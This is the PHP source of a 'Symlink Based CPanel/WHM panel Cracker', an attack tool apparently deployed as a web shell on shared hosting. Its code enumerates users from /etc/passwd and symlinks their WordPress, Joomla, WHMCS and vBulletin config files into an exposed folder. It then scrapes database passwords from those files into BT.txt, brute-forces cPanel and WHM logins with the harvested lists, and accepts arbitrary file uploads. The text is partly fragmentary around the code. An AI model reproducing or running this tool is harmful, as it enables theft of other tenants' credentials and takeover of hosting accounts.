Symlink Based CPanel/WHM panel Cracker

'; ?>

link to php.ini file"; echo $link; } ?>

<?php $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; } ?>

"; if(isset($_POST['su'])) { $dir=mkdir('BT',0777); $r = " Options all \n DirectoryIndex BT.html \n Require None \n Satisfy Any"; $f = fopen('BT/.htaccess','w'); fwrite($f,$r); $consym="Configuration files"; echo "
Folder Where Config Files has been Symlinked
$consym"; $usr=explode("\n",$_POST['user']); foreach($usr as $uss ) { $us=trim($uss); $r="BT/"; symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config'); symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp'); symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog'); symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs'); symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla'); symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc'); symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb'); symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global'); symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc'); symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config'); symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings'); symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites'); symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm'); symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs'); symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs'); symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM'); symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc'); symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs'); symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp'); symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli'); symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl'); symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL'); symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl'); symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup'); symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill'); symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf'); } } ?>

OK++'; $ffile=fopen('BT.txt','a+'); $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/BT/"; $re=$r; $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill"); $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); $usersss=$str[0]; foreach($confi as $co) { $uurl=$re.$usersss.$co; $uel=$uurl; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $uel); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $result['EXE'] = curl_exec($ch); curl_close($ch); $uxl=$result['EXE']; if($uxl && preg_match('/table_prefix/i',$uxl)) { echo "
$usersss User's CMS is Wordpress
"; echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');"); if(!empty($dbp)) $pass=$dbp."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl)) { echo "
$usersss User's CMS is Whmcs
"; echo $dbp=entre2v2($uxl,"db_password = '","';"); if(!empty($dbp)) $pass=$dbp."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbprefix/i',$uxl)) { echo "
$usersss User's CMS is Joomla
"; echo $db=entre2v2($uxl,"password = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/admincpdir/i',$uxl)) { echo "
$usersss User's CMS is vbulletin
"; echo $db=entre2v2($uxl,"password'] = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/DB_DATABASE/i',$uxl)) { echo "
Got Config File for Unknwon CMS of User $usersss
"; echo $db=entre2v2($uxl,"DB_PASSWORD', '","');"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbpass/i',$uxl)) { echo "
Got Config File for Unknwon CMS of User $usersss
"; echo $db=entre2v2($uxl,"dbpass = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbpass/i',$uxl)) { echo "
Got Config File for Unknwon CMS of User $usersss
"; echo $db=entre2v2($uxl,"dbpass = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbpass/i',$uxl)) { echo "
Got Config File for Unknwon CMS of User $usersss
"; echo $db=entre2v2($uxl,"dbpass = \"","\";"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } } } } ?>

want to brute=>
<?php $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; } ?><?php $d=getcwd()."/BT.txt"; $pf=file($d); foreach($pf as $rt) { $str=explode('\n',$rt); echo trim($str[0])."\n"; } ?>

Cracked Username is $user & Password is $pass "; } curl_close($ch);} $userlist=explode("\n",$userl); $passlist=explode("\n",$passl); if ($attack == "cp") { foreach ($userlist as $user) { echo "
Attacking user $user
"; $finaluser = trim($user); foreach ($passlist as $password ) { $finalpass = trim($password); cpanel($target,$finaluser,$finalpass,$connect_timeout); } } } function whm($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:2086"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 0 ){ echo "
Cracked Username is $user & Password is $pass
"; } curl_close($ch);} $userlist=explode("\n",$userl); $passlist=explode("\n",$passl); if ($attack == "whm") { foreach ($userlist as $user) { echo "
user under attack is $user
"; $finaluser = trim($user); foreach ($passlist as $password ) { $finalpass = trim($password); whm($target,$finaluser,$finalpass,$connect_timeout); } } } } elseif($userl=="") { echo "you have left userlist field empty"; } elseif($passl=="") { echo "please put passwords in paasword list field"; } } ?> '; echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '

'; } else { echo 'Not uploaded !

'; } } ?>